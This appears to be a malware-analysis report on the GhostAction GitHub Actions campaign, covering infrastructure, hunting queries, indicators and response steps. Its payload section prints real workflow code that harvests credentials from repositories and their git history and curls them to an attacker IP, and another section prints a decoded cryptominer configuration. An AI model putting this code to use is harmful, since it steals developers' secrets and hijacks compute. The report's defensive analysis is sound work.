cd /news/ai-safety/ghostaction-attack-escalates-by-targ… · home › topics › ai-safety › article
[ARTICLE · art-148542] src=opensourcemalware.com ↗ pub= topic=ai-safety verified=true sentiment=↓ negative

GhostAction Attack Escalates By Targeting GitHub Users

OpenSourceMalware identified a new escalation of the GhostAction supply-chain campaign, in which attackers compromise GitHub accounts and inject malicious Actions workflows that steal CI/CD secrets, including package-publishing, cloud, GitHub, and AI-service credentials. The newer .github/workflows/security-audit.yml variant scans the full checkout and git history for credential-shaped strings, captures contextual lines around AWS keys, and POSTs the results over unencrypted HTTP to 193.32.204.199/?c=monami. Two newly registered domains, my-gitlab.com on September 22, 2026 and my-github.com on October 9, 2026, may signal a developer-targeting phishing wave, with my-github.com pointing directly to the active GhostAction collector IP.

by read21 min views1 publishedOct 9, 2026
GhostAction Attack Escalates By Targeting GitHub Users
Image: Opensourcemalware (auto-discovered)

BLOG

OSM has identified a new evolution of the GhostAction attack, which targets GitHub users via malicious CI workflow files and worm-like behaviour

By c0a15726-c5b1-4b0d-85e6-fe15553df9e2 ·

OpenSourceMalware has identified a new stage in the ongoing "GhostAction" malicious campaign that GitGuardian originally identified in 2025. This latest evolution appears to be an escalation and used two new domains targeting GitHub and GitLab.

The GhostAction campaign is a continuing supply-chain campaign in which attackers compromise GitHub accounts and inject malicious Actions workflows across every repository those accounts can modify. Triggered by pushes or manual execution, the workflows steal CI/CD secrets—including package-publishing, cloud, GitHub, and AI-service credentials—and exfiltrate them to attacker-controlled infrastructure. Later variants expanded collection by scanning repository contents and complete git history, recovering credentials that developers believed had been deleted. GitGuardian (https://blog.gitguardian.com/ghostaction-github-actions-supply-chain-attack- returns/)

Earlier today Socket and StepSecurity subsequently traced a renewed, highly automated wave to compromised maintainers whose access exposed hundreds of repositories, including prominent projects and long-dormant codebases. Their findings show that GhostAction remains an active account-takeover and credential-theft operation: attackers enumerate all writable repositories, push workflows directly without review, trigger executions, and use stolen publishing or cloud secrets to enable further supply-chain compromise.

The established GhostAction payload reads specifically named GitHub Actions secrets and sends them to attacker infrastructure. The newer .github/workflows/security-audit.yml variant also searches the complete checkout and git history for credential-shaped strings, captures contextual lines surrounding AWS keys, and POSTs the combined results over unencrypted HTTP to 193.32.204.199/?c=monami.

Responders must assume exposure of active Actions secrets and credentials previously committed and later deleted. Removing the workflow does not revoke stolen credentials, invalidate the GitHub token used to alter the repository, or address packages, images, releases, and deployments produced during the compromise.

Early Warning: A Possible New Developer-Targeting Wave #

Two newly registered, code-hosting-themed domains may signal the next phase of developer targeting. my-gitlab.com was registered on September 22, 2026, followed 17 days later by my-github.com. The domains share the exact my-<major code-host>.com construction and the parallel <brand>.my-<brand>.com form. my-github.com points directly to the active GhostAction collector IP; gitlab.my-gitlab.com hosts an apparent GitLab service on separate AWS infrastructure. Common ownership is not yet proven, but the naming, timing, and developer-facing services justify early monitoring for phishing, malicious clone URLs, token theft, CI configuration abuse, and payload delivery.

The infrastructure suggests a possible shift from conspicuous IP-address collectors toward domains designed to look familiar to developers:

my-gitlab.com          registered 2026-09-22
└── gitlab.my-gitlab.com

my-github.com          registered 2026-10-09
└── github.my-github.com

This pattern could support several attacks against developers: GitHub or GitLab credential phishing, OAuth or personal-access-token theft, malicious repository clone instructions, fake API endpoints, poisoned package or release downloads, runner registration, and CI/CD secret collection. These are forecast scenarios derived from the naming and exposed services; they have not all been observed.

my-github.com is the higher-confidence indicator because it resolves directly to 193.32.204.199, the current GhostAction exfiltration and scanning host. It also has wildcard DNS, allowing whoever controls the domain to use convincing hostnames without publishing individual records. my-gitlab.com is a lower-confidence watchlist domain: its configured gitlab.my-gitlab.com hostname resolves to an AWS EC2 address in Hong Kong where passive Shodan data identifies GitLab and nginx on ports 80 and 443.

The pair is not technically attributed to one operator. They use different registrars, registrant records, Cloudflare nameserver pairs, IP addresses, ASNs, and DNS designs, and no shared certificate or account artifact has been recovered. Defenders should nevertheless hunt and monitor both domains now because waiting for confirmed victim telemetry would forfeit the value of the early warning.

Recommended monitoring:

  • DNS, proxy, browser, email, and endpoint events containing either apex domain or any subdomain;
  • Git remotes, package metadata, documentation, workflow files, and shell history referencing either domain;
  • authentication pages, OAuth redirects, personal-access-token prompts, runner-registration instructions, and clone URLs using the domains;
  • outbound connections from developer workstations, CI runners, build systems, and package-publishing hosts;
  • future DNS, certificate, hosting, and repository changes that create a direct link between the two domains.

Threat Overview #

Attribute

Value

Threat

GhostAction

Type

CI/CD credential theft and software supply-chain intrusion

Platform

GitHub and GitHub Actions

Severity

Critical where workflows can access publishing, cloud, or deployment secrets

First documented

September 2025

Current endpoint

193.32.204.199 over HTTP

Files

github_actions_security.yml, security-check.yml, security-audit.yml

Triggers

push, workflow_dispatch

Discovery #

The investigation began with claudecord. PyPI version 0.3.2 contains .github/workflows/github_actions_security.yml, which POSTs named deployment, npm, and PyPI secrets to http://193.32.204.199. Its SHA-256 is:

7fbd40446a82c77b23432c6ab73bd8595c98e90e4f4a473198b4d1256f3e8c4b

The claimed upstream, kanavdhanda/claudeCord, shows the initial implant in commit a69f8c4, followed two seconds later by Trigger security scan. Commit dd08e03 added .github/workflows/security-audit.yml the next day. Commit 7e03c5a later removed the remaining malicious workflow.

GitGuardian reported 772 affected repositories between August 31 and September 30. OpenSourceMalware can currently recover 717 through that cutoff and 790 through October 9. Repositories and commits may disappear after disclosure, while injections continued after GitGuardian’s window; the present dataset is therefore a reproducible public lower bound.

October 8 Mass Injection

Socket and StepSecurity resolved the newest activity to two compressed sweeps:

UTC window

Compromised account

Repositories

Detail

13:20–13:44

kitao

27

kitao/pyxel received one add and two update commits

21:10–21:26

henrywoo

318

39 source repositories, 279 forks, plus uber/athenadriver

Total

2 accounts

346

Automated enumeration of writable repositories

The sweep included active projects and repositories dormant for roughly a decade, supporting automated enumeration rather than project selection. kitao/pyxel had approximately 18,420 stars at Socket’s collection time. The Uber-owned uber/athenadriver repository was reachable because its original author retained write access after the project moved under the Uber organization.

The athenadriver injection went directly to master without a pull request or review and used the legitimate maintainer identity as author and committer. StepSecurity reports that the commit was unsigned. Author identity therefore provides weak detection when a valid credential is abused; content, review state, burst timing, push path, and runner egress are stronger signals.

Socket observed successful executions and found the workflow still present on default branches it checked on October 9. It had not observed malicious PyPI or crates.io releases attributable to this wave at publication time. That narrows observed impact but does not reduce the need to rotate publishing credentials.

Infrastructure #

Period

Endpoint

Reported repositories

September 2025

bold-dhawan.45-139-104-115.plesk.page

~900 total for the wave

September 2025

carte-avantage.com

Included above

September 2025

objective-hopper.45-139-104-115.plesk.page

Included above

Oct–Dec 2025; March 2026

170.39.218.2

~75

Nov 2025; March–April 2026

*.oast.fun

~250

Aug–Sept 2026

193.32.204.199

772 reported

September 2026

193.32.204.199:3000/api/workflow/receive?inj=<id>

7

October 2026

193.32.204.199/?c=monami

Unresolved

StepSecurity places the current IP in honeypot telemetry on September 4, 2026 and in an infected public repository on September 5. Those dates provide an earlier investigation boundary than the major public injection bursts.

Infrastructure Reuse Beyond GhostAction

Dedicated infrastructure research found that 193.32.204.199 is also an active malicious internet scanner. GreyNoise, Shodan, OTX, SCARD, SANS ISC, and BlockList.de independently observed scanning, brute-force, web probing, or honeypot traffic. A SANS daily view recorded 11,286 probes to TCP/8080, while SCARD recorded 413 events dominated by suspicious web-scanner user agents. In incident response, distinguish inbound scanning from this IP from outbound GitHub-runner traffic to it; the latter is direct evidence of workflow exfiltration.

The legacy IP 45.139.104.115 has 389 OTX passive-DNS records spanning a phishing-heavy neighborhood. Recurring themes include Ameli/Carte Vitale, government fines, parcel delivery, Netflix, banking, and SNCF. carte-avantage.com was independently reported as an SNCF payment-card phishing site before its 2025 GhostAction use. This establishes multi-purpose malicious use of the infrastructure but does not prove that one operator controlled every co-hosted domain.

Current IP ownership and exposure

RIPE RDAP assigns 193.32.204.0/24 to the object vcyber, with Vigilant Cyber SAS as the registered organization and abuse@vigilantcyber.top as the abuse contact. The prefix is currently announced by AS153622, Madina IT. Commercial geolocation sources variously place the address in Helsinki, Istanbul, or Turkey. These records describe allocation, routing, and database-derived location respectively; none establishes where the GhostAction operator resides.

Shodan InternetDB observed OpenSSH 8.9p1 on TCP/22, Apache 2.4.52 on TCP/80, and TCP/8900. URLScan independently recorded http://193.32.204.199/c/ returning Apache 2.4.52 on Ubuntu. Version-derived CVEs in Shodan are exposure hypotheses and do not prove exploitability.

The scanning evidence is independent of the GitHub campaign:

Source

Observation

GreyNoise

noise=true, classification=malicious, last seen October 8

Shodan

scanner tag

OTX

50 pulses covering HTTP scanning, TCP/8080, brute force, and multi-protocol honeypots

68 attacks across 8 reports

SCARD

413 events; surfaced signature dominated by suspicious web-scanner user agents

SANS ISC

11,286 TCP/8080 probes in a daily top-scanner view

Feed tags such as Mirai, Mozi, WannaCry, or ransomware are not proof that the host ran those malware families. Several OTX pulses are bulk honeypot feeds whose names describe the monitored threat set. The supported finding is that the same IP used for GhostAction exfiltration was generating broad hostile scanning and probing traffic.

my-github.com: same-day domain on the current collector

my-github.com is a new and highly relevant pivot on the active GhostAction IP:

Property

Observation

Registered

2026-10-09T09:50:00Z

Registrar

Dynadot Inc., IANA ID 472

Registrant

Not disclosed in public RDAP

Expiration

2027-10-09

Nameservers

kianchau.ns.cloudflare.com, selah.ns.cloudflare.com

Current A record

193.32.204.199

DNSSEC

Not signed in observed registration data

The domain was registered on the day this infrastructure was being publicly investigated and uses a name that impersonates or invokes GitHub. It does not use Cloudflare’s reverse proxy in the observed A record; DNS resolves directly to the GhostAction collector. Public scan reporting associated the domain with Vigilant Cyber hosting and observed a valid TLS presentation.

URLScan submitted https://my-github.com/SDRVuhYw at 15:48 UTC on October 9. The observed navigation finished at a YouTube Rickroll URL. That behavior may represent operator taunting, a disposable redirect, an unrelated tenant, or researcher activity after disclosure. It is not evidence of credential phishing by itself.

The timing, brand-related name, and exact A-record overlap make my-github.com a high-priority indicator and pivot. There is still no direct workflow, account, registrar, or server-side evidence proving that the GhostAction operator registered it. The report therefore classifies it as suspicious infrastructure associated by IP, operator attribution unresolved.

Hunt the domain in DNS, proxy, email, certificate, and GitHub content telemetry:

my-github.com
*.my-github.com
"my-github.com" path:.github/workflows
"193.32.204.199" "my-github.com"

Any outbound GitHub runner connection to my-github.com should be investigated as potential campaign adaptation even if the workflow no longer contains the literal IP.

Four reported labels—ghassets.my-github.com, github.my-github.com, api.my-github.com, and gh.my-github.com—also resolve to 193.32.204.199. None currently has an AAAA, CNAME, or TXT record, and no exact public URLScan capture or OTX passive-DNS history was found for them.

Random control labels also resolve to the same address with the same TTL, confirming wildcard DNS for *.my-github.com. The names are semantically consistent with GitHub impersonation, but DNS resolution does not prove they are separately configured services: any invented label resolves. Count the apex as the infrastructure node, retain the four surfaced labels as hunt terms, and require HTTP Host, TLS SNI, certificate, email, workflow, or victim telemetry before asserting active use of an individual subdomain.

ghassets.my-github.com
github.my-github.com
api.my-github.com
gh.my-github.com

Related GitLab-themed domain

my-gitlab.com was registered on September 22, 2026, 17 days before my-github.com. It follows the same my-<code-host>.com naming pattern, making it a useful pivot, but current infrastructure does not connect it to GhostAction. It uses Gname rather than Dynadot, has a different Cloudflare nameserver pair, and does not resolve to 193.32.204.199.

The apex currently has no address or mail records. The explicitly configured gitlab.my-gitlab.com hostname resolves to 18.167.164.26, an AWS EC2 address in Hong Kong. Shodan InternetDB reports ports 80 and 443 with GitLab and nginx fingerprints, consistent with a functioning self-hosted GitLab service. Random subdomain controls return NXDOMAIN, so this domain does not use the wildcard behavior seen on my-github.com. Public URLScan, OTX, search, and Certificate Transparency checks produced no malicious or campaign-specific evidence.

Classify my-gitlab.com and gitlab.my-gitlab.com as watchlist indicators: relationship unconfirmed. Their naming and timing warrant monitoring, but treating them as confirmed GhostAction infrastructure would exceed the evidence. Useful next pivots are workflow references, login or clone URLs in endpoint telemetry, certificate reuse, registrar artifacts, victim reports, and future passive-DNS changes.

The strongest connection between my-gitlab.com and my-github.com is the exact my-<major code-host>.com naming construction combined with registration 17 days apart. There is also a parallel <brand>.my-<brand>.com form: gitlab.my-gitlab.com is explicitly configured, while github.my-github.com resolves through the GitHub-themed domain’s wildcard. Tests of analogous GitHub, GitLab, API, asset, registry, package, authentication, and login labels under my-gitlab.com returned NXDOMAIN except for gitlab.my-gitlab.com; the evidence therefore shows a strong lexical pattern, not a mirrored subdomain deployment.

No operator-specific link was found: the domains use different registrars, privacy/registrant records, Cloudflare nameserver pairs, SOA serials, IP addresses, ASNs, DNS designs, and hosting providers. No shared certificate, passive observation, or relevant indexed co-occurrence was identified. Cloudflare DNS, one-year registration, transfer locks, and disabled DNSSEC are common defaults and carry little attribution weight. The relationship remains a credible hypothesis until a shared token, certificate or key, origin, account, repository reference, payload, or victim-side sequence is recovered.

Legacy IP and phishing-platform overlap

ARIN assigns 45.139.104.0/24 to 49.3 Networking LLC, and RIPE routing data shows AS399979 announcing it throughout the relevant 2024–2026 period. OTX passive DNS produced 389 records representing 355 normalized names. At minimum, keyword clustering found 68 parcel/postal impersonation names, 29 French health/Ameli/Carte Vitale names, 13 government/fine/tax names, nine Netflix/streaming names, and seven banking/payment/insurance names.

Examples include dhl-colis-track.com, chronopost-tracker.com, ameli-remboursement.com, fisc-gouv.info, netflix-secure-france.com, client-axa.info, and leetchi-verif.com. Independent reputation sources classify several neighbors as phishing, spam, possible malware, or sinkholed infrastructure. This establishes phishing-heavy hosting, though shared hosting prevents assigning every name to GhostAction.

objective-hopper.45-139-104-115.plesk.page still resolves to the legacy IP. bold-dhawan.45-139-104-115.plesk.page currently returns NXDOMAIN. The adjective-surname labels are consistent with automatically generated Plesk preview hostnames and do not reveal a human registrant.

carte-avantage.com: phishing-to-GhostAction crossover

Public victim reports describe sncf.carte-avantage.com impersonating SNCF Connect and offering a €49 discount card for €2.45. Reports state that the site collected identity and payment-card data while most non-payment navigation was inert. GitGuardian later found carte-avantage.com used as a GhostAction exfiltration endpoint.

Current RDAP shows a Dynadot registration from August 15, 2025, an undisclosed registrant, and redemption status after expiration in August 2026. The domain currently returns NXDOMAIN. It received Let’s Encrypt certificates immediately after the 2025 registration, resolved to 45.139.104.115 by August 17, and appeared in GhostAction the following month. That sequence strongly ties the 2025 registration instance to the legacy campaign infrastructure.

Archives and Certificate Transparency show older domain lives in 2018, 2021–2022, and 2024. The 2025 creation date reflects re-registration rather than first-ever use. Consequently, the 2022/2024 SNCF phishing operator and 2025 GhostAction operator cannot be assumed identical without historical WHOIS, registrar-payment, or server-control evidence. Public RDAP does not expose a defensible individual owner.

Full ownership, routing, passive-DNS, certificate, scanning, and attribution analysis is in ghostaction_infrastructure_2026-10-09.md.

Attack Chain #

  1. Valid repository access: the actor uses access associated with the victim identity. Displayed authorship alone cannot distinguish authorized work from token abuse.
  2. Workflow injection: a security-themed file is written below.github/workflows/ .
  3. Execution: the injection push can trigger the newly added workflow; later pushes retrigger it, andworkflow_dispatch permits manual execution.
  4. Retriggering: an inert timestamp comment is appended toREADME.md , creating another push.
  5. Collection: named Actions secrets are expanded; the new variant also scans current and historical source.
  6. Exfiltration:curl --data-binary sends a victim-labelled multiline record over HTTP.

GitHub resolves ${{ secrets.NAME }} before Bash receives the script. Missing secrets become empty strings; existing values become command data. Log masking does not prevent the runner from transmitting the underlying value.

Payload Evolution #

Targeted-secret workflow

The PyPI artifact contains the established collector:

curl -s -X POST -d 'DEPLOY_HOST=${{ secrets.DEPLOY_HOST }}&DEPLOY_SSH_KEY=${{ secrets.DEPLOY_SSH_KEY }}&NPM_TOKEN=${{ secrets.NPM_TOKEN }}&PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' http://193.32.204.199

Secret names vary by victim, indicating that the actor inspected existing workflow or configuration references and generated a tailored collector. It cannot enumerate stored secret values; it references names learned beforehand and relies on Actions expression expansion.

New security-audit.yml

The latest version combines three collectors:

  1. explicit repository-specific Actions secrets;
  2. regex matches in the checked-out tree;
  3. regex matches and contextual lines from all reachable git patches.

It sends results to http://193.32.204.199/?c=monami. The query value may label a campaign or collector version; its server-side meaning is unresolved.

Full-history checkout

- uses: actions/checkout@v4
  with:
    fetch-depth: 0

fetch-depth: 0 obtains complete reachable history instead of a shallow checkout. Credentials deleted from the visible branch remain available to git log -p --all. The setting is legitimate by itself and becomes high-risk when correlated with secret regexes and an unrelated external POST.

Victim identity and direct secrets

out="REPO=$GITHUB_REPOSITORY"
[ -n "CARGO_REGISTRY_TOKEN=${{ secrets.CARGO_REGISTRY_TOKEN }}&PERSONAL_ACCESS_TOKEN=${{ secrets.PERSONAL_ACCESS_TOKEN }}&PYPI_PASSWORD=${{ secrets.PYPI_PASSWORD }}&PYPI_USERNAME=${{ secrets.PYPI_USERNAME }}" ] && out="$out&..."

GITHUB_REPOSITORY identifies the victim. Because literal parameter names remain even when all secrets are empty, the -n condition is always true. The example targets Rust and Python publishing plus a general access token; observed lists also include cloud, container, SSH, database, bot, npm, PyPI, and GitHub credentials.

Current-tree collection

grepped=$(grep -rEiho "..." --exclude-dir=.git . 2>/dev/null | sort -u)

-r scans recursively, -E enables extended regexes, -i ignores case, -h removes filenames, and -o returns only matches. Errors are hidden and results deduplicated. Targeted families include:

Pattern

Credential

AKIA..., ASIA...

AWS long-term and STS access-key IDs

sk-ant-...

Anthropic

sk-proj-...

OpenAI project key

sk-or-...

OpenRouter

ghp_..., github_pat_...

GitHub PATs

glpat-...

GitLab PAT

AIza...

Google API key

xox[baprs]-...

Slack token

SG.<part>.<part>

SendGrid key

secret_access_key...

AWS secret access key assignment

aws_session_token...

AWS session-token assignment

The regex uses PCRE non-capturing groups such as (?:v1-)? with grep -E, which implements POSIX ERE. Behavior may vary and produce warnings or missed matches; 2>/dev/null hides failures. This defect reduces reliability but does not neutralize ordinary ERE branches.

Git-history collection

gl=$(git log -p --all 2>/dev/null | head -200000)
hist=$(echo "$gl" | grep -oiE "..." | sort -u | head -300)

git log -p --all emits metadata and diffs for every reachable reference. The actor retains up to 200,000 output lines and 300 unique matches. Deleted lines are included, so credentials removed from current source can still be collected. Large repositories bias toward recent history because git normally walks newest commits first.

AWS context collection

ctx=$(grep -rEi -B2 -A2 "AKIA...|ASIA..." --exclude-dir=.git . 2>/dev/null | head -150)
hctx=$(echo "$gl" | grep -Ei -B2 -A2 "AKIA...|ASIA..." | head -150)

These commands collect two surrounding lines rather than only the key ID. Context may disclose the paired secret key, region, role, account, bucket, hostname, username, or other credentials. Current and historical context are each capped at 150 lines and wrapped with distinctive AKIA_CTX_START and AKIA_CTX_END markers.

Exfiltration

curl -s -m 20 -X POST --data-binary "$full" "http://193.32.204.199/?c=monami" || true

--data-binary preserves newlines. The body contains repository identity, named secrets, AWS context, current matches, and historical matches. Plain HTTP exposes stolen data in transit. -s suppresses output, -m 20 limits delay, and || true prevents a failed POST from failing the step. The final non-empty check is always satisfied because the body begins with the repository name, so every run sends at least a victim beacon.

GitHub Hunting Queries #

High-confidence infrastructure searches

The most effective primary search quotes the IP and scopes the result set to executable GitHub Actions workflow paths, independent of filename:

"193.32.204.199" path:.github/workflows
https://github.com/search?q=%22193.32.204.199%22+path%3A.github%2Fworkflows&type=code

This query detects github_actions_security.yml, security-check.yml, security-audit.yml, and renamed copies in one pass. Quoting the IP requires the complete literal indicator, while the path constraint removes documentation, IOC feeds, issue templates, and non-executable source files that mention the campaign. Results still require content review because defenders may intentionally commit detections or blocked indicators inside workflow files.

Use the following searches as broader discovery and filename-specific pivots:

193.32.204.199 language:YAML
path:github_actions_security.yml 193.32.204.199
path:security-audit.yml 193.32.204.199
path:security-check.yml "193.32.204.199:3000/api/workflow/receive"

Version-specific payload searches

path:.github/workflows "AKIA_CTX_START" "git log -p --all"
path:.github/workflows "AKIA_CTX_END" "--data-binary"
path:security-audit.yml "?c=monami"
path:.github/workflows "head -200000" "head -300" "git log -p --all"
path:.github/workflows "aws_session_token" "fetch-depth: 0" "--data-binary"
path:.github/workflows/github_actions_security.yml "Prepare Cache Busting" "send-secrets"

Historical infrastructure

path:.github/workflows "bold-dhawan.45-139-104-115.plesk.page"
path:.github/workflows "objective-hopper.45-139-104-115.plesk.page"
path:.github/workflows "carte-avantage.com"
path:.github/workflows "170.39.218.2"
path:.github/workflows "oast.fun" "send-secrets"

Commit history

"Add Github Actions Security workflow"
"Update Github Actions Security workflow"
"Add security check workflow"
"Add security audit workflow"
"Update security audit workflow"
"Trigger security scan"

Phrase search also returns longer messages and bodies. Fetch the file at each returned SHA and verify infrastructure or a distinctive content marker before assigning it to the campaign.

Detection

Confidence

Guidance

Known IP plus malicious workflow path

Very high

Direct campaign correlation

AKIA_CTX_START plus git log -p --all

Very high

Distinctive latest collector

?c=monami plus --data-binary

Very high

Version-specific route

Exact commit message alone

Medium

Validate file at SHA

fetch-depth: 0 plus secret regexes

Low–medium

Legitimate scanners do this

security-audit.yml filename alone

Low

Common legitimate filename

October 8 Account and Repository Pivots

user:henrywoo path:.github/workflows/security-audit.yml
user:kitao path:.github/workflows/security-audit.yml
repo:uber/athenadriver path:.github/workflows/security-audit.yml
repo:kitao/pyxel path:.github/workflows/security-audit.yml

Treat fork results separately from source repositories. Socket counted 279 affected forks under henrywoo; a committed workflow in a fork becomes an execution risk when Actions is enabled and a qualifying event gives it access to that fork’s secret context.

Validated Repository Scope #

Evidence

Repositories

Validation

Added main workflow

683

Exact message; historical file and IP verified

Updated main workflow

272

Exact message; historical file and IP verified

Port-3000 variant

7

Historical file and endpoint verified

Deduplicated set

790

Union of validated evidence

Supporting datasets are ghostaction_repositories_summary.csv, ghostaction_affected_repositories.csv, and ghostaction_trigger_commits_sample.csv beside this report.

MITRE ATT&CK #

Tactic

Technique

ID

Initial Access

Valid Accounts: Cloud Accounts

T1078.004

Initial Access

Compromise Software Supply Chain

T1195.002

Execution

Unix Shell

T1059.004

Persistence

Event Triggered Execution

T1546

Credential Access

Credentials In Files

T1552.001

Credential Access

Private Keys

T1552.004

Discovery

File and Directory Discovery

T1083

Collection

Data from Local System

T1005

Command and Control

Web Protocols

T1071.001

Exfiltration

Exfiltration Over C2 Channel

T1041

Public evidence does not establish how the original GitHub credentials were obtained.

Indicators of Compromise #

193.32.204.199
http://193.32.204.199/?c=monami
http://193.32.204.199:3000/api/workflow/receive?inj=<id>
my-github.com
*.my-github.com
ghassets.my-github.com
github.my-github.com
api.my-github.com
gh.my-github.com
https://my-github.com/SDRVuhYw
170.39.218.2
45.139.104.115
bold-dhawan.45-139-104-115.plesk.page
objective-hopper.45-139-104-115.plesk.page
carte-avantage.com
*.oast.fun

.github/workflows/github_actions_security.yml
.github/workflows/security-check.yml
.github/workflows/security-audit.yml

Prepare Cache Busting
send-secrets
AKIA_CTX_START
AKIA_CTX_END
git log -p --all 2>/dev/null | head -200000
curl -s -m 20 -X POST --data-binary

Filenames alone are not malicious indicators; correlate them with infrastructure or behavior.

Related watchlist indicators—not attributed to GhostAction

my-gitlab.com
gitlab.my-gitlab.com
18.167.164.26

The IP is shared cloud infrastructure and should only be used with the hostname or other corroborating context.

Separate DevOpsGPT Miner #

Commit 614a565 modifies Dockerfile, run.sh, and two scheduler files to install and persist XMRig as /usr/local/bin/pyworker. Static XOR decoding with devops2024 yields:

pool.supportxmr.com:3333
832eKef1fNRTQdiJeJzsvkMMsogMp22FR2FLX1oaV5BxGfoMcJvkcbFgWgNRyNfsE19D9pdM1zdU7D9kRLdJbM5rU1vjfcL
worker1
--cpu-max-threads-hint=30
--donate-level=0

The five expected fields are present, differing from GitGuardian’s conclusion that the configuration was truncated. The miner predates GhostAction in this repository and uses different, tailored tradecraft. Treat it as separate activity through a shared compromised identity unless further evidence connects the operators.

Incident Response #

  1. Disable Actions temporarily and preserve workflows, run IDs, logs, commits, audit logs, and package/release records.
  2. Revoke GitHub PATs, OAuth grants, App credentials, deploy keys, and sessions associated with the compromised identity.
  3. Remove malicious workflows from executable branches and tags; preserve evidence separately.
  4. Block campaign infrastructure without contacting it.
  5. Rotate every named Actions secret, then search and rotate matching credentials in full git history.
  6. Prioritize source-control, registry, cloud, SSH, deployment, database, and container credentials.
  7. Audit packages, releases, images, and deployments produced during the compromise window.
  8. Rebuild trusted artifacts from a verified pre-compromise commit in a clean environment.

Harden repositories with protected branches, reviewed workflow changes, .github/workflows/** ownership rules, least-privilege organization secrets, short-lived credentials, and cloud OIDC. Alert when workflows combine full-history checkout, git-diff scanning, credential regexes, and outbound network clients.

Require approval for new or modified workflows wherever repository policy permits it. StepSecurity reports that workflow approval was the control observed stopping exfiltration in this wave. Apply runner egress allowlists as a second layer: the collector connects directly to a raw IP on ports 80 or 3000, producing no DNS lookup for domain-only controls to inspect. Historical network telemetry for those destinations can identify the repository, workflow, job, and step that attempted collection.

Limitations #

  • Deleted, private, force-pushed, and unindexed repositories are outside the recoverable public set.
  • The prevalence of the newest exact security-audit.yml variant remains unresolved because its generic commit message creates substantial noise.
  • Workflow content proves attempted collection, not successful delivery or credential validity.
  • c=monami andinj=<id> appear to route or label collection; attacker infrastructure was not contacted.
  • Additional malware may exist under unrelated names or commit messages.

References #

Report suspicious packages and repositories to OpenSourceMalware.com.

Report generated by the OpenSourceMalware Team.

── more in #ai-safety 4 stories · sorted by recency
── more on @opensourcemalware 3 stories trending now
sponsored brought to you by zahid.host 4,200+ EU-deployed projects
reading about agents? ship yours in a single git push.

Run your AI side-project on zahid.host

EU-based hosting, git-push deploys, automatic HTTPS, no cold starts. Free tier with a custom domain — perfect for shipping the agent you just read about.

$git push zahid main
→ Live at https://your-agent.zahid.host ✓
Get free account → Pricing
from €0/mo · no card required
LIVE [news/ghostaction-attack-e…] indexed:0 read:21min 2026-10-09 · —